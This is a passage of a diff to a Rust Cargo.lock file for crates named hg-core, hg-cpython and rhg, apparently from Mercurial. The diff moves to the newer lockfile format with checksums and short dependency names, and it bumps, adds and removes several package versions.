+checksum = "7411863d55df97a419aa64cb4d2f167103ea9d767e2c54a1868b7ac3f6b47129"
dependencies = [
- "cfg-if 1.0.0 (registry+https://github.com/rust-lang/crates.io-index)",
- "crc32fast 1.2.1 (registry+https://github.com/rust-lang/crates.io-index)",
- "libc 0.2.81 (registry+https://github.com/rust-lang/crates.io-index)",
- "libz-sys 1.1.2 (registry+https://github.com/rust-lang/crates.io-index)",
- "miniz_oxide 0.4.3 (registry+https://github.com/rust-lang/crates.io-index)",
+ "cfg-if 1.0.0",
+ "crc32fast",
+ "libc",
+ "libz-sys",
+ "miniz_oxide",
]
[[package]]
name = "format-bytes"
-version = "0.1.3"
+version = "0.2.2"
source = "registry+https://github.com/rust-lang/crates.io-index"
+checksum = "1c4e89040c7fd7b4e6ba2820ac705a45def8a0c098ec78d170ae88f1ef1d5762"
dependencies = [
- "format-bytes-macros 0.1.2 (registry+https://github.com/rust-lang/crates.io-index)",
- "proc-macro-hack 0.5.19 (registry+https://github.com/rust-lang/crates.io-index)",
+ "format-bytes-macros",
+ "proc-macro-hack",
]
[[package]]
name = "format-bytes-macros"
-version = "0.1.2"
+version = "0.3.0"
source = "registry+https://github.com/rust-lang/crates.io-index"
+checksum = "b05089e341a0460449e2210c3bf7b61597860b07f0deae58da38dbed0a4c6b6d"
dependencies = [
- "proc-macro-hack 0.5.19 (registry+https://github.com/rust-lang/crates.io-index)",
- "proc-macro2 1.0.24 (registry+https://github.com/rust-lang/crates.io-index)",
- "quote 1.0.7 (registry+https://github.com/rust-lang/crates.io-index)",
- "syn 1.0.54 (registry+https://github.com/rust-lang/crates.io-index)",
+ "proc-macro-hack",
+ "proc-macro2",
+ "quote",
+ "syn",
]
[[package]]
name = "fuchsia-cprng"
version = "0.1.1"
source = "registry+https://github.com/rust-lang/crates.io-index"
+checksum = "a06f77d526c1a601b7c4cdd98f54b5eaabffc14d5f2f0296febdc7f357c6d3ba"
[[package]]
name = "gcc"
version = "0.3.55"
source = "registry+https://github.com/rust-lang/crates.io-index"
+checksum = "8f5f3913fa0bfe7ee1fd8248b6b9f42a5af4b9d65ec2dd2c3c26132b950ecfc2"
[[package]]
name = "getrandom"
version = "0.1.15"
source = "registry+https://github.com/rust-lang/crates.io-index"
+checksum = "fc587bc0ec293155d5bfa6b9891ec18a1e330c234f896ea47fbada4cadbe47e6"
dependencies = [
- "cfg-if 0.1.10 (registry+https://github.com/rust-lang/crates.io-index)",
- "libc 0.2.81 (registry+https://github.com/rust-lang/crates.io-index)",
- "wasi 0.9.0+wasi-snapshot-preview1 (registry+https://github.com/rust-lang/crates.io-index)",
+ "cfg-if 0.1.10",
+ "libc",
+ "wasi 0.9.0+wasi-snapshot-preview1",
]
[[package]]
name = "glob"
version = "0.3.0"
source = "registry+https://github.com/rust-lang/crates.io-index"
+checksum = "9b919933a397b79c37e33b77bb2aa3dc8eb6e165ad809e58ff75bc7db2e34574"
[[package]]
name = "hermit-abi"
version = "0.1.17"
source = "registry+https://github.com/rust-lang/crates.io-index"
+checksum = "5aca5565f760fb5b220e499d72710ed156fdb74e631659e99377d9ebfbd13ae8"
dependencies = [
- "libc 0.2.81 (registry+https://github.com/rust-lang/crates.io-index)",
+ "libc",
]
[[package]]
-name = "hex"
-version = "0.4.2"
-source = "registry+https://github.com/rust-lang/crates.io-index"
-
-[[package]]
name = "hg-core"
version = "0.1.0"
dependencies = [
- "byteorder 1.3.4 (registry+https://github.com/rust-lang/crates.io-index)",
- "clap 2.33.3 (registry+https://github.com/rust-lang/crates.io-index)",
- "crossbeam-channel 0.4.4 (registry+https://github.com/rust-lang/crates.io-index)",
- "flate2 1.0.19 (registry+https://github.com/rust-lang/crates.io-index)",
- "format-bytes 0.1.3 (registry+https://github.com/rust-lang/crates.io-index)",
- "hex 0.4.2 (registry+https://github.com/rust-lang/crates.io-index)",
- "im-rc 15.0.0 (registry+https://github.com/rust-lang/crates.io-index)",
- "lazy_static 1.4.0 (registry+https://github.com/rust-lang/crates.io-index)",
- "log 0.4.11 (registry+https://github.com/rust-lang/crates.io-index)",
- "memchr 2.3.4 (registry+https://github.com/rust-lang/crates.io-index)",
- "memmap 0.7.0 (registry+https://github.com/rust-lang/crates.io-index)",
- "micro-timer 0.3.1 (registry+https://github.com/rust-lang/crates.io-index)",
- "pretty_assertions 0.6.1 (registry+https://github.com/rust-lang/crates.io-index)",
- "rand 0.7.3 (registry+https://github.com/rust-lang/crates.io-index)",
- "rand_distr 0.2.2 (registry+https://github.com/rust-lang/crates.io-index)",
- "rand_pcg 0.2.1 (registry+https://github.com/rust-lang/crates.io-index)",
- "rayon 1.5.0 (registry+https://github.com/rust-lang/crates.io-index)",
- "regex 1.4.2 (registry+https://github.com/rust-lang/crates.io-index)",
- "rust-crypto 0.2.36 (registry+https://github.com/rust-lang/crates.io-index)",
- "same-file 1.0.6 (registry+https://github.com/rust-lang/crates.io-index)",
- "tempfile 3.1.0 (registry+https://github.com/rust-lang/crates.io-index)",
- "twox-hash 1.6.0 (registry+https://github.com/rust-lang/crates.io-index)",
- "zstd 0.5.3+zstd.1.4.5 (registry+https://github.com/rust-lang/crates.io-index)",
+ "byteorder",
+ "bytes-cast",
+ "clap",
+ "crossbeam-channel 0.4.4",
+ "derive_more",
+ "flate2",
+ "format-bytes",
+ "home",
+ "im-rc",
+ "lazy_static",
+ "log",
+ "memmap",
+ "micro-timer",
+ "pretty_assertions",
+ "rand 0.7.3",
+ "rand_distr",
+ "rand_pcg",
+ "rayon",
+ "regex",
+ "rust-crypto",
+ "same-file",
+ "tempfile",
+ "twox-hash",
+ "zstd",
]
[[package]]
name = "hg-cpython"
version = "0.1.0"
dependencies = [
- "cpython 0.4.1 (registry+https://github.com/rust-lang/crates.io-index)",
- "env_logger 0.7.1 (registry+https://github.com/rust-lang/crates.io-index)",
- "hg-core 0.1.0",
- "libc 0.2.81 (registry+https://github.com/rust-lang/crates.io-index)",
- "log 0.4.11 (registry+https://github.com/rust-lang/crates.io-index)",
+ "cpython",
+ "crossbeam-channel 0.4.4",
+ "env_logger",
+ "hg-core",
+ "libc",
+ "log",
+]
+
+[[package]]
+name = "home"
+version = "0.5.3"
+source = "registry+https://github.com/rust-lang/crates.io-index"
+checksum = "2456aef2e6b6a9784192ae780c0f15bc57df0e918585282325e8c8ac27737654"
+dependencies = [
+ "winapi",
]
[[package]]
name = "humantime"
version = "1.3.0"
source = "registry+https://github.com/rust-lang/crates.io-index"
+checksum = "df004cfca50ef23c36850aaaa59ad52cc70d0e90243c3c7737a4dd32dc7a3c4f"
dependencies = [
- "quick-error 1.2.3 (registry+https://github.com/rust-lang/crates.io-index)",
+ "quick-error",
]
[[package]]
name = "im-rc"
version = "15.0.0"
source = "registry+https://github.com/rust-lang/crates.io-index"
+checksum = "3ca8957e71f04a205cb162508f9326aea04676c8dfd0711220190d6b83664f3f"
dependencies = [
- "bitmaps 2.1.0 (registry+https://github.com/rust-lang/crates.io-index)",
- "rand_core 0.5.1 (registry+https://github.com/rust-lang/crates.io-index)",
- "rand_xoshiro 0.4.0 (registry+https://github.com/rust-lang/crates.io-index)",
- "sized-chunks 0.6.2 (registry+https://github.com/rust-lang/crates.io-index)",
- "typenum 1.12.0 (registry+https://github.com/rust-lang/crates.io-index)",
- "version_check 0.9.2 (registry+https://github.com/rust-lang/crates.io-index)",
+ "bitmaps",
+ "rand_core 0.5.1",
+ "rand_xoshiro",
+ "sized-chunks",
+ "typenum",
+ "version_check",
]
[[package]]
name = "itertools"
version = "0.9.0"
source = "registry+https://github.com/rust-lang/crates.io-index"
+checksum = "284f18f85651fe11e8a991b2adb42cb078325c996ed026d994719efcfca1d54b"
dependencies = [
- "either 1.6.1 (registry+https://github.com/rust-lang/crates.io-index)",
+ "either",
]
[[package]]
name = "jobserver"
version = "0.1.21"
source = "registry+https://github.com/rust-lang/crates.io-index"
+checksum = "5c71313ebb9439f74b00d9d2dcec36440beaf57a6aa0623068441dd7cd81a7f2"
dependencies = [
- "libc 0.2.81 (registry+https://github.com/rust-lang/crates.io-index)",
+ "libc",
]
[[package]]
name = "lazy_static"
version = "1.4.0"
source = "registry+https://github.com/rust-lang/crates.io-index"
+checksum = "e2abad23fbc42b3700f2f279844dc832adb2b2eb069b2df918f455c4e18cc646"
[[package]]
name = "libc"
version = "0.2.81"
source = "registry+https://github.com/rust-lang/crates.io-index"
+checksum = "1482821306169ec4d07f6aca392a4681f66c75c9918aa49641a2595db64053cb"
[[package]]
name = "libz-sys"
version = "1.1.2"
source = "registry+https://github.com/rust-lang/crates.io-index"
+checksum = "602113192b08db8f38796c4e85c39e960c145965140e918018bcde1952429655"
dependencies = [
- "cc 1.0.66 (registry+https://github.com/rust-lang/crates.io-index)",
- "pkg-config 0.3.19 (registry+https://github.com/rust-lang/crates.io-index)",
- "vcpkg 0.2.11 (registry+https://github.com/rust-lang/crates.io-index)",
+ "cc",
+ "pkg-config",
+ "vcpkg",
]
[[package]]
name = "log"
version = "0.4.11"
source = "registry+https://github.com/rust-lang/crates.io-index"
+checksum = "4fabed175da42fed1fa0746b0ea71f412aa9d35e76e95e59b192c64b9dc2bf8b"
dependencies = [
- "cfg-if 0.1.10 (registry+https://github.com/rust-lang/crates.io-index)",
+ "cfg-if 0.1.10",
]
[[package]]
name = "maybe-uninit"
version = "2.0.0"
source = "registry+https://github.com/rust-lang/crates.io-index"
+checksum = "60302e4db3a61da70c0cb7991976248362f30319e88850c487b9b95bbf059e00"
[[package]]
name = "memchr"
version = "2.3.4"
source = "registry+https://github.com/rust-lang/crates.io-index"
+checksum = "0ee1c47aaa256ecabcaea351eae4a9b01ef39ed810004e298d2511ed284b1525"
[[package]]
name = "memmap"
version = "0.7.0"
source = "registry+https://github.com/rust-lang/crates.io-index"
+checksum = "6585fd95e7bb50d6cc31e20d4cf9afb4e2ba16c5846fc76793f11218da9c475b"
dependencies = [
- "libc 0.2.81 (registry+https://github.com/rust-lang/crates.io-index)",
- "winapi 0.3.9 (registry+https://github.com/rust-lang/crates.io-index)",
+ "libc",
+ "winapi",
]
[[package]]
name = "memoffset"
version = "0.6.1"
source = "registry+https://github.com/rust-lang/crates.io-index"
+checksum = "157b4208e3059a8f9e78d559edc658e13df41410cb3ae03979c83130067fdd87"
dependencies = [
- "autocfg 1.0.1 (registry+https://github.com/rust-lang/crates.io-index)",
+ "autocfg",
]
[[package]]
name = "micro-timer"
version = "0.3.1"
source = "registry+https://github.com/rust-lang/crates.io-index"
+checksum = "2620153e1d903d26b72b89f0e9c48d8c4756cba941c185461dddc234980c298c"
dependencies = [
- "micro-timer-macros 0.3.1 (registry+https://github.com/rust-lang/crates.io-index)",
- "scopeguard 1.1.0 (registry+https://github.com/rust-lang/crates.io-index)",
+ "micro-timer-macros",
+ "scopeguard",
]
[[package]]
name = "micro-timer-macros"
version = "0.3.1"
source = "registry+https://github.com/rust-lang/crates.io-index"
+checksum = "e28a3473e6abd6e9aab36aaeef32ad22ae0bd34e79f376643594c2b152ec1c5d"
dependencies = [
- "proc-macro2 1.0.24 (registry+https://github.com/rust-lang/crates.io-index)",
- "quote 1.0.7 (registry+https://github.com/rust-lang/crates.io-index)",
- "scopeguard 1.1.0 (registry+https://github.com/rust-lang/crates.io-index)",
- "syn 1.0.54 (registry+https://github.com/rust-lang/crates.io-index)",
+ "proc-macro2",
+ "quote",
+ "scopeguard",
+ "syn",
]
[[package]]
name = "miniz_oxide"
version = "0.4.3"
source = "registry+https://github.com/rust-lang/crates.io-index"
+checksum = "0f2d26ec3309788e423cfbf68ad1800f061638098d76a83681af979dc4eda19d"
dependencies = [
- "adler 0.2.3 (registry+https://github.com/rust-lang/crates.io-index)",
- "autocfg 1.0.1 (registry+https://github.com/rust-lang/crates.io-index)",
+ "adler",
+ "autocfg",
+]
+
+[[package]]
+name = "num-integer"
+version = "0.1.44"
+source = "registry+https://github.com/rust-lang/crates.io-index"
+checksum = "d2cc698a63b549a70bc047073d2949cce27cd1c7b0a4a862d08a8031bc2801db"
+dependencies = [
+ "autocfg",
+ "num-traits",
]
[[package]]
name = "num-traits"
version = "0.2.14"
source = "registry+https://github.com/rust-lang/crates.io-index"
+checksum = "9a64b1ec5cda2586e284722486d802acf1f7dbdc623e2bfc57e65ca1cd099290"
dependencies = [
- "autocfg 1.0.1 (registry+https://github.com/rust-lang/crates.io-index)",
+ "autocfg",
]
[[package]]
name = "num_cpus"
version = "1.13.0"
source = "registry+https://github.com/rust-lang/crates.io-index"
+checksum = "05499f3756671c15885fee9034446956fff3f243d6077b91e5767df161f766b3"
dependencies = [
- "hermit-abi 0.1.17 (registry+https://github.com/rust-lang/crates.io-index)",
- "libc 0.2.81 (registry+https://github.com/rust-lang/crates.io-index)",
+ "hermit-abi",
+ "libc",
]
[[package]]
name = "output_vt100"
version = "0.1.2"
source = "registry+https://github.com/rust-lang/crates.io-index"
+checksum = "53cdc5b785b7a58c5aad8216b3dfa114df64b0b06ae6e1501cef91df2fbdf8f9"
dependencies = [
- "winapi 0.3.9 (registry+https://github.com/rust-lang/crates.io-index)",
+ "winapi",
+]
+
+[[package]]
+name = "paste"
+version = "0.1.18"
+source = "registry+https://github.com/rust-lang/crates.io-index"
+checksum = "45ca20c77d80be666aef2b45486da86238fabe33e38306bd3118fe4af33fa880"
+dependencies = [
+ "paste-impl",
+ "proc-macro-hack",
+]
+
+[[package]]
+name = "paste-impl"
+version = "0.1.18"
+source = "registry+https://github.com/rust-lang/crates.io-index"
+checksum = "d95a7db200b97ef370c8e6de0088252f7e0dfff7d047a28528e47456c0fc98b6"
+dependencies = [
+ "proc-macro-hack",
]
[[package]]
name = "pkg-config"
version = "0.3.19"
source = "registry+https://github.com/rust-lang/crates.io-index"
+checksum = "3831453b3449ceb48b6d9c7ad7c96d5ea673e9b470a1dc578c2ce6521230884c"
[[package]]
name = "ppv-lite86"
version = "0.2.10"
source = "registry+https://github.com/rust-lang/crates.io-index"
+checksum = "ac74c624d6b2d21f425f752262f42188365d7b8ff1aff74c82e45136510a4857"
[[package]]
name = "pretty_assertions"
version = "0.6.1"
source = "registry+https://github.com/rust-lang/crates.io-index"
+checksum = "3f81e1644e1b54f5a68959a29aa86cde704219254669da328ecfdf6a1f09d427"
dependencies = [
- "ansi_term 0.11.0 (registry+https://github.com/rust-lang/crates.io-index)",
- "ctor 0.1.16 (registry+https://github.com/rust-lang/crates.io-index)",
- "difference 2.0.0 (registry+https://github.com/rust-lang/crates.io-index)",
- "output_vt100 0.1.2 (registry+https://github.com/rust-lang/crates.io-index)",
+ "ansi_term",
+ "ctor",
+ "difference",
+ "output_vt100",
]
[[package]]
name = "proc-macro-hack"
version = "0.5.19"
source = "registry+https://github.com/rust-lang/crates.io-index"
+checksum = "dbf0c48bc1d91375ae5c3cd81e3722dff1abcf81a30960240640d223f59fe0e5"
[[package]]
name = "proc-macro2"
version = "1.0.24"
source = "registry+https://github.com/rust-lang/crates.io-index"
+checksum = "1e0704ee1a7e00d7bb417d0770ea303c1bccbabf0ef1667dae92b5967f5f8a71"
dependencies = [
- "unicode-xid 0.2.1 (registry+https://github.com/rust-lang/crates.io-index)",
+ "unicode-xid",
]
[[package]]
name = "python27-sys"
-version = "0.4.1"
+version = "0.5.2"
source = "registry+https://github.com/rust-lang/crates.io-index"
+checksum = "f485897ed7048f5032317c4e427800ef9f2053355516524d73952b8b07032054"
dependencies = [
- "libc 0.2.81 (registry+https://github.com/rust-lang/crates.io-index)",
- "regex 1.4.2 (registry+https://github.com/rust-lang/crates.io-index)",
+ "libc",
+ "regex",
]
[[package]]
name = "python3-sys"
-version = "0.4.1"
+version = "0.5.2"
source = "registry+https://github.com/rust-lang/crates.io-index"
+checksum = "5b29b99c6868eb02beb3bf6ed025c8bcdf02efc149b8e80347d3e5d059a806db"
dependencies = [
- "libc 0.2.81 (registry+https://github.com/rust-lang/crates.io-index)",
- "regex 1.4.2 (registry+https://github.com/rust-lang/crates.io-index)",
+ "libc",
+ "regex",
]
[[package]]
name = "quick-error"
version = "1.2.3"
source = "registry+https://github.com/rust-lang/crates.io-index"
+checksum = "a1d01941d82fa2ab50be1e79e6714289dd7cde78eba4c074bc5a4374f650dfe0"
[[package]]
name = "quote"
version = "1.0.7"
source = "registry+https://github.com/rust-lang/crates.io-index"
+checksum = "aa563d17ecb180e500da1cfd2b028310ac758de548efdd203e18f283af693f37"
dependencies = [
- "proc-macro2 1.0.24 (registry+https://github.com/rust-lang/crates.io-index)",
+ "proc-macro2",
]
[[package]]
name = "rand"
version = "0.3.23"
source = "registry+https://github.com/rust-lang/crates.io-index"
+checksum = "64ac302d8f83c0c1974bf758f6b041c6c8ada916fbb44a609158ca8b064cc76c"
dependencies = [
- "libc 0.2.81 (registry+https://github.com/rust-lang/crates.io-index)",
- "rand 0.4.6 (registry+https://github.com/rust-lang/crates.io-index)",
+ "libc",
+ "rand 0.4.6",
]
[[package]]
name = "rand"
version = "0.4.6"
source = "registry+https://github.com/rust-lang/crates.io-index"
+checksum = "552840b97013b1a26992c11eac34bdd778e464601a4c2054b5f0bff7c6761293"
dependencies = [
- "fuchsia-cprng 0.1.1 (registry+https://github.com/rust-lang/crates.io-index)",
- "libc 0.2.81 (registry+https://github.com/rust-lang/crates.io-index)",
- "rand_core 0.3.1 (registry+https://github.com/rust-lang/crates.io-index)",
- "rdrand 0.4.0 (registry+https://github.com/rust-lang/crates.io-index)",
- "winapi 0.3.9 (registry+https://github.com/rust-lang/crates.io-index)",
+ "fuchsia-cprng",
+ "libc",
+ "rand_core 0.3.1",
+ "rdrand",
+ "winapi",
]
[[package]]
name = "rand"
version = "0.7.3"
source = "registry+https://github.com/rust-lang/crates.io-index"
+checksum = "6a6b1679d49b24bbfe0c803429aa1874472f50d9b363131f0e89fc356b544d03"
dependencies = [
- "getrandom 0.1.15 (registry+https://github.com/rust-lang/crates.io-index)",
- "libc 0.2.81 (registry+https://github.com/rust-lang/crates.io-index)",
- "rand_chacha 0.2.2 (registry+https://github.com/rust-lang/crates.io-index)",
- "rand_core 0.5.1 (registry+https://github.com/rust-lang/crates.io-index)",
- "rand_hc 0.2.0 (registry+https://github.com/rust-lang/crates.io-index)",
+ "getrandom",
+ "libc",
+ "rand_chacha",
+ "rand_core 0.5.1",
+ "rand_hc",
]
[[package]]
name = "rand_chacha"
version = "0.2.2"
source = "registry+https://github.com/rust-lang/crates.io-index"
+checksum = "f4c8ed856279c9737206bf725bf36935d8666ead7aa69b52be55af369d193402"
dependencies = [
- "ppv-lite86 0.2.10 (registry+https://github.com/rust-lang/crates.io-index)",
- "rand_core 0.5.1 (registry+https://github.com/rust-lang/crates.io-index)",
+ "ppv-lite86",
+ "rand_core 0.5.1",
]
[[package]]
name = "rand_core"
version = "0.3.1"
source = "registry+https://github.com/rust-lang/crates.io-index"
+checksum = "7a6fdeb83b075e8266dcc8762c22776f6877a63111121f5f8c7411e5be7eed4b"
dependencies = [
- "rand_core 0.4.2 (registry+https://github.com/rust-lang/crates.io-index)",
+ "rand_core 0.4.2",
]
[[package]]
name = "rand_core"
version = "0.4.2"
source = "registry+https://github.com/rust-lang/crates.io-index"
+checksum = "9c33a3c44ca05fa6f1807d8e6743f3824e8509beca625669633be0acbdf509dc"
[[package]]
name = "rand_core"
version = "0.5.1"
source = "registry+https://github.com/rust-lang/crates.io-index"
+checksum = "90bde5296fc891b0cef12a6d03ddccc162ce7b2aff54160af9338f8d40df6d19"
dependencies = [
- "getrandom 0.1.15 (registry+https://github.com/rust-lang/crates.io-index)",
+ "getrandom",
]
[[package]]
name = "rand_distr"
version = "0.2.2"
source = "registry+https://github.com/rust-lang/crates.io-index"
+checksum = "96977acbdd3a6576fb1d27391900035bf3863d4a16422973a409b488cf29ffb2"
dependencies = [
- "rand 0.7.3 (registry+https://github.com/rust-lang/crates.io-index)",
+ "rand 0.7.3",
]
[[package]]
name = "rand_hc"
version = "0.2.0"
source = "registry+https://github.com/rust-lang/crates.io-index"
+checksum = "ca3129af7b92a17112d59ad498c6f81eaf463253766b90396d39ea7a39d6613c"
dependencies = [
- "rand_core 0.5.1 (registry+https://github.com/rust-lang/crates.io-index)",
+ "rand_core 0.5.1",
]
[[package]]
name = "rand_pcg"
version = "0.2.1"
source = "registry+https://github.com/rust-lang/crates.io-index"
+checksum = "16abd0c1b639e9eb4d7c50c0b8100b0d0f849be2349829c740fe8e6eb4816429"
dependencies = [
- "rand_core 0.5.1 (registry+https://github.com/rust-lang/crates.io-index)",
+ "rand_core 0.5.1",
]
[[package]]
name = "rand_xoshiro"
version = "0.4.0"
source = "registry+https://github.com/rust-lang/crates.io-index"
+checksum = "a9fcdd2e881d02f1d9390ae47ad8e5696a9e4be7b547a1da2afbc61973217004"
dependencies = [
- "rand_core 0.5.1 (registry+https://github.com/rust-lang/crates.io-index)",
+ "rand_core 0.5.1",
]
[[package]]
name = "rayon"
version = "1.5.0"
source = "registry+https://github.com/rust-lang/crates.io-index"
+checksum = "8b0d8e0819fadc20c74ea8373106ead0600e3a67ef1fe8da56e39b9ae7275674"
dependencies = [
- "autocfg 1.0.1 (registry+https://github.com/rust-lang/crates.io-index)",
- "crossbeam-deque 0.8.0 (registry+https://github.com/rust-lang/crates.io-index)",
- "either 1.6.1 (registry+https://github.com/rust-lang/crates.io-index)",
- "rayon-core 1.9.0 (registry+https://github.com/rust-lang/crates.io-index)",
+ "autocfg",
+ "crossbeam-deque",
+ "either",
+ "rayon-core",
]
[[package]]
name = "rayon-core"
version = "1.9.0"
source = "registry+https://github.com/rust-lang/crates.io-index"
+checksum = "9ab346ac5921dc62ffa9f89b7a773907511cdfa5490c572ae9be1be33e8afa4a"
dependencies = [
- "crossbeam-channel 0.5.0 (registry+https://github.com/rust-lang/crates.io-index)",
- "crossbeam-deque 0.8.0 (registry+https://github.com/rust-lang/crates.io-index)",
- "crossbeam-utils 0.8.1 (registry+https://github.com/rust-lang/crates.io-index)",
- "lazy_static 1.4.0 (registry+https://github.com/rust-lang/crates.io-index)",
- "num_cpus 1.13.0 (registry+https://github.com/rust-lang/crates.io-index)",
+ "crossbeam-channel 0.5.0",
+ "crossbeam-deque",
+ "crossbeam-utils 0.8.1",
+ "lazy_static",
+ "num_cpus",
]
[[package]]
name = "rdrand"
version = "0.4.0"
source = "registry+https://github.com/rust-lang/crates.io-index"
+checksum = "678054eb77286b51581ba43620cc911abf02758c91f93f479767aed0f90458b2"
dependencies = [
- "rand_core 0.3.1 (registry+https://github.com/rust-lang/crates.io-index)",
+ "rand_core 0.3.1",
]
[[package]]
name = "redox_syscall"
version = "0.1.57"
source = "registry+https://github.com/rust-lang/crates.io-index"
+checksum = "41cc0f7e4d5d4544e8861606a285bb08d3e70712ccc7d2b84d7c0ccfaf4b05ce"
[[package]]
name = "regex"
version = "1.4.2"
source = "registry+https://github.com/rust-lang/crates.io-index"
+checksum = "38cf2c13ed4745de91a5eb834e11c00bcc3709e773173b2ce4c56c9fbde04b9c"
dependencies = [
- "aho-corasick 0.7.15 (registry+https://github.com/rust-lang/crates.io-index)",
- "memchr 2.3.4 (registry+https://github.com/rust-lang/crates.io-index)",
- "regex-syntax 0.6.21 (registry+https://github.com/rust-lang/crates.io-index)",
- "thread_local 1.0.1 (registry+https://github.com/rust-lang/crates.io-index)",
+ "aho-corasick",
+ "memchr",
+ "regex-syntax",
+ "thread_local",
]
[[package]]
name = "regex-syntax"
version = "0.6.21"
source = "registry+https://github.com/rust-lang/crates.io-index"
+checksum = "3b181ba2dcf07aaccad5448e8ead58db5b742cf85dfe035e2227f137a539a189"
[[package]]
name = "remove_dir_all"
version = "0.5.3"
source = "registry+https://github.com/rust-lang/crates.io-index"
+checksum = "3acd125665422973a33ac9d3dd2df85edad0f4ae9b00dafb1a05e43a9f5ef8e7"
dependencies = [
- "winapi 0.3.9 (registry+https://github.com/rust-lang/crates.io-index)",
+ "winapi",
]
[[package]]
name = "rhg"
version = "0.1.0"
dependencies = [
- "clap 2.33.3 (registry+https://github.com/rust-lang/crates.io-index)",
- "env_logger 0.7.1 (registry+https://github.com/rust-lang/crates.io-index)",
- "format-bytes 0.1.3 (registry+https://github.com/rust-lang/crates.io-index)",
- "hg-core 0.1.0",
- "log 0.4.11 (registry+https://github.com/rust-lang/crates.io-index)",
- "micro-timer 0.3.1 (registry+https://github.com/rust-lang/crates.io-index)",
+ "chrono",
+ "clap",
+ "derive_more",
+ "env_logger",
+ "format-bytes",
+ "hg-core",
+ "lazy_static",
+ "log",
+ "micro-timer",
+ "regex",
+ "users",
]
[[package]]
name = "rust-crypto"
version = "0.2.36"
source = "registry+https://github.com/rust-lang/crates.io-index"
+checksum = "f76d05d3993fd5f4af9434e8e436db163a12a9d40e1a58a726f27a01dfd12a2a"
dependencies = [
- "gcc 0.3.55 (registry+https://github.com/rust-lang/crates.io-index)",
- "libc 0.2.81 (registry+https://github.com/rust-lang/crates.io-index)",
- "rand 0.3.23 (registry+https://github.com/rust-lang/crates.io-index)",
- "rustc-serialize 0.3.24 (registry+https://github.com/rust-lang/crates.io-index)",
- "time 0.1.44 (registry+https://github.com/rust-lang/crates.io-index)",
+ "gcc",
+ "libc",
+ "rand 0.3.23",
+ "rustc-serialize",
+ "time",
]
[[package]]
name = "rustc-serialize"
version = "0.3.24"
source = "registry+https://github.com/rust-lang/crates.io-index"
+checksum = "dcf128d1287d2ea9d80910b5f1120d0b8eede3fbf1abe91c40d39ea7d51e6fda"
[[package]]
name = "same-file"
version = "1.0.6"
source = "registry+https://github.com/rust-lang/crates.io-index"
+checksum = "93fc1dc3aaa9bfed95e02e6eadabb4baf7e3078b0bd1b4d7b6b0b68378900502"
dependencies = [
- "winapi-util 0.1.5 (registry+https://github.com/rust-lang/crates.io-index)",
+ "winapi-util",
]
[[package]]
name = "scopeguard"
version = "1.1.0"
source = "registry+https://github.com/rust-lang/crates.io-index"
+checksum = "d29ab0c6d3fc0ee92fe66e2d99f700eab17a8d57d1c1d3b748380fb20baa78cd"
[[package]]
name = "sized-chunks"
version = "0.6.2"
source = "registry+https://github.com/rust-lang/crates.io-index"
+checksum = "1ec31ceca5644fa6d444cc77548b88b67f46db6f7c71683b0f9336e671830d2f"
dependencies = [
- "bitmaps 2.1.0 (registry+https://github.com/rust-lang/crates.io-index)",
- "typenum 1.12.0 (registry+https://github.com/rust-lang/crates.io-index)",
+ "bitmaps",
+ "typenum",
]
[[package]]
name = "static_assertions"
version = "1.1.0"
source = "registry+https://github.com/rust-lang/crates.io-index"
+checksum = "a2eb9349b6444b326872e140eb1cf5e7c522154d69e7a0ffb0fb81c06b37543f"
[[package]]
name = "strsim"
version = "0.8.0"
source = "registry+https://github.com/rust-lang/crates.io-index"
+checksum = "8ea5119cdb4c55b55d432abb513a0429384878c15dde60cc77b1c99de1a95a6a"
[[package]]
name = "syn"
version = "1.0.54"
source = "registry+https://github.com/rust-lang/crates.io-index"
+checksum = "9a2af957a63d6bd42255c359c93d9bfdb97076bd3b820897ce55ffbfbf107f44"
dependencies = [
- "proc-macro2 1.0.24 (registry+https://github.com/rust-lang/crates.io-index)",
- "quote 1.0.7 (registry+https://github.com/rust-lang/crates.io-index)",
- "unicode-xid 0.2.1 (registry+https://github.com/rust-lang/crates.io-index)",
+ "proc-macro2",
+ "quote",
+ "unicode-xid",
]
[[package]]
name = "tempfile"
version = "3.1.0"
source = "registry+https://github.com/rust-lang/crates.io-index"
+checksum = "7a6e24d9338a0a5be79593e2fa15a648add6138caa803e2d5bc782c371732ca9"
dependencies = [
- "cfg-if 0.1.10 (registry+https://github.com/rust-lang/crates.io-index)",
- "libc 0.2.81 (registry+https://github.com/rust-lang/crates.io-index)",
- "rand 0.7.3 (registry+https://github.com/rust-lang/crates.io-index)",
- "redox_syscall 0.1.57 (registry+https://github.com/rust-lang/crates.io-index)",
- "remove_dir_all 0.5.3 (registry+https://github.com/rust-lang/crates.io-index)",
- "winapi 0.3.9 (registry+https://github.com/rust-lang/crates.io-index)",
+ "cfg-if 0.1.10",
+ "libc",
+ "rand 0.7.3",
+ "redox_syscall",
+ "remove_dir_all",
+ "winapi",
]
[[package]]
name = "termcolor"
version = "1.1.2"
source = "registry+https://github.com/rust-lang/crates.io-index"
+checksum = "2dfed899f0eb03f32ee8c6a0aabdb8a7949659e3466561fc0adf54e26d88c5f4"
dependencies = [
- "winapi-util 0.1.5 (registry+https://github.com/rust-lang/crates.io-index)",
+ "winapi-util",
]
[[package]]
name = "textwrap"
version = "0.11.0"
source = "registry+https://github.com/rust-lang/crates.io-index"
+checksum = "d326610f408c7a4eb6f51c37c330e496b08506c9457c9d34287ecc38809fb060"
dependencies = [
- "unicode-width 0.1.8 (registry+https://github.com/rust-lang/crates.io-index)",
+ "unicode-width",
]
[[package]]
name = "thread_local"
version = "1.0.1"
source = "registry+https://github.com/rust-lang/crates.io-index"
+checksum = "d40c6d1b69745a6ec6fb1ca717914848da4b44ae29d9b3080cbee91d72a69b14"
dependencies = [
- "lazy_static 1.4.0 (registry+https://github.com/rust-lang/crates.io-index)",
+ "lazy_static",
]
[[package]]
name = "time"
version = "0.1.44"
source = "registry+https://github.com/rust-lang/crates.io-index"
+checksum = "6db9e6914ab8b1ae1c260a4ae7a49b6c5611b40328a735b21862567685e73255"
dependencies = [
- "libc 0.2.81 (registry+https://github.com/rust-lang/crates.io-index)",
- "wasi 0.10.0+wasi-snapshot-preview1 (registry+https://github.com/rust-lang/crates.io-index)",
- "winapi 0.3.9 (registry+https://github.com/rust-lang/crates.io-index)",
+ "libc",
+ "wasi 0.10.0+wasi-snapshot-preview1",
+ "winapi",
]
[[package]]
name = "twox-hash"
version = "1.6.0"
source = "registry+https://github.com/rust-lang/crates.io-index"
+checksum = "04f8ab788026715fa63b31960869617cba39117e520eb415b0139543e325ab59"
dependencies = [
